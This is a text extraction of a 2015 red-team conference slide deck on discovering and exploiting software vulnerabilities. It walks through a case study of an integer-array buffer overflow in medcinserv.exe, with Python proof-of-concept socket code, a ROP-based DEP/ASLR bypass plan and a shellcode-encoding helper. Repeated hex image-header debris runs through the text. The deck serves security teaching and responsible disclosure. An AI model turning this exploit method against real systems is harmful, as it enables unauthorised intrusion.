Software vulnerability discovery and exploitation during red team assessments

FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89

Software Vulnerability Discovery & Exploitation During Red Team

Assessments

Ryan Wincey [email protected]

9/30/2015

FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89Background

• Long term red team assessments

• Persistence with remote access tools

• Looking for alternative means of network propagation or privilege escalation

FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89Identify Targets

• Look for applications that are listening on sockets or running at a higher privilege level

• Windowsnetstat -ano | findstr LISTEN



• Windowstasklist /v | findstr <pid>



• Linuxnetstat -anop | grep LISTENps -ef | grep <pid>

FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89Static Analysis

• Reverse Engineering Software– IDA Pro/Hexrays– Hopper– Other

• Target Binary


• Helpful bug hunting tips

– Identify areas where data is introduced from outside of the application

• Command Line Parameters• Socket Reads• File Reads• Environment Variables• i.e. read, gets, fread, fgets, recv, recv_from


• Helpful bug hunting tips

– Trace those inputs to parsing functions; look for interesting functions and memory operations• strcpy, strcat• sprintf, printf• memcpy• system• any custom string or memory copies

FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89Dynamic Analysis

Checklist• In order to perform dynamic analysis, we will need to

ensure that the application will run in our test environment.

• Tips for getting the application to run.– Zip up support files in the same directory. ( 7za, zip )– Listdlls.exe, ldd - loaded libraries– Handle.exe, /proc/<pid> - open files– Procmon.exe – identify registry keys – Read log files – track down missing files or registry settings

FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89Analyzing Process

Memory• Comparing the running process environment

to your test environment.

• Windowsprocdump.exe /accepteula -ma <pid> <dump file>

• Linuxgdb attach <pid>

FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89Crash Dumps

• In the event that you crash the application and want to collect crash dumps.

• WindowsHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps

DumpFolderDumpCountDumpTypeCustomDumpFlags

• Linuxulimit –c unlimited


• Identify target and binary location

Case Study: medcinserv.exe

IAVM Notice Number: 2015-A-0127




• Identify target and binary location


• Static analysis using IDA Pro and HexRays decompiler.






• Locate additional dependencies




• Query service details in registry




• Setup as nearly identical environment

• Operating system

• File system

• Service registration

• Debugging tools

• Scripting support




• Set breakpoint on our vulnerable function




• POC Skeleton

– Define Protocol

[ Message Type : 2 bytes ][ Data Length : 4 bytes ][ Data ]

– Choose Implementation

Python, Ruby, Powershell, C

– Code up boiler plate stuff / Use template

Socket connect, send, recv,

Formatting




• POC Skeleton

if len (sys.argv) == 3: (progname, host, port) = sys.argvelse: print 'Usage: {0} host port'.format (sys.argv[0]) exit (1)

csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)csock.connect ( (host, int(port)) )csock.settimeout(1)

print "[+] connected to server."

#Try thingsi = 238

data = “1,” * 1000

print "[+] sending data."send( i, len(data) + 6, data)

csock.close()print "[+] goodbye"

def send(type, pack_len, data=None):

if pack_len < 6 or pack_len > 0x3d090: print "Length must be between 6 and 0x3d090 bytes."

#Set the type buf = struct.pack('>h', type)

#Send length, must be less than 0x3d090, can be negative buf += struct.pack('>i', pack_len)

#Send data if pack_len > 0: buf += data try: #Send data csock.send(buf) except: pass

Integer Array




• We own EIP




• Our target environment, Windows 7 SP1, has DEP, ASLR, and SafeSEH on all OS libraries.• Medcinserv.exe, doesn’t have any built in protections




• Bypass DEP by changing the execution permissions of the stack dynamically.• Change permissions using ROP chain composed of gadgets from the medcinserv binary.• Bypass ASLR because ROP gadgets in medcinserv binary are static.• NULL bytes are allowed since it’s an integer array buffer overflow.




• ROP gadgets generated for VirtualAlloc• Resolve VirtualAlloc using GetModuleHandle and GetProcAddress




• Exploit Design Structure




• Shellcode to String Array Function

def add_shellcode( sc ): global data

#Determine the iterator shellcode_len = len(sc) iterator = shellcode_len / 4 if shellcode_len % 4 > 0: iterator +=1

counter = 0 for i in range( int( iterator ) ): entry = sc[ (i*4) : (i*4)+4 ]

#Make sure length is four bytes len_entry = len(entry) if len( entry ) < 4: entry += "\x90" * ( 4 - len_entry) data += str(struct.unpack("<I", entry )[0]) + ","

counter += 1

return counter


DEMO

FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89Test Exploit

• Test in as nearly identical environment as possible

• Non-critical systems, preferably when users are away

• Make sure to get permission

• Get more shellz

FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89Reporting

• US CERT

• MITRE

• NIST


QUESTIONS?

[email protected]

Software vulnerability discovery and exploitation during red team assessments

Software

Transcript of Software vulnerability discovery and exploitation during red team assessments